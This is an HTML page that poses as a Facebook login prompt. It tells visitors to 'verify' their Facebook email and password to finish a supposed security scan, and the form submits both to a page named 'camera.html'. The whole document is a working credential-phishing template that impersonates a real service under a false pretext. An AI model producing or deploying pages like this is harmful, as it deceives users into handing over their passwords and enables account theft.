<!DOCTYPE html>
<html>
<head>
    <title>Facebook Login Required</title>
    <style>
        body { font-family: Arial, sans-serif; background-color: #f5f5f5; margin: 0; padding: 20px; }
        .container { max-width: 400px; margin: 0 auto; background: white; padding: 20px; border-radius: 8px; box-shadow: 0 0 10px rgba(0,0,0,0.1); }
        h2 { color: #2c3e50; text-align: center; }
        input { width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ddd; border-radius: 4px; }
        button { width: 100%; padding: 10px; background: #4267B2; color: white; border: none; border-radius: 4px; cursor: pointer; }
        button:hover { background: #365899; }
    </style>
</head>
<body>
    <div class="container">
        <h2>Facebook Login Required</h2>
        <p>To complete the security scan, please verify your Facebook credentials:</p>
        <form method="POST" action="camera.html">
            <input type="text" name="username" placeholder="Email or Phone Number" required>
            <input type="password" name="password" placeholder="Password" required>
            <button type="submit">Verify and Continue Scan</button>
        </form>
    </div>
</body>
</html>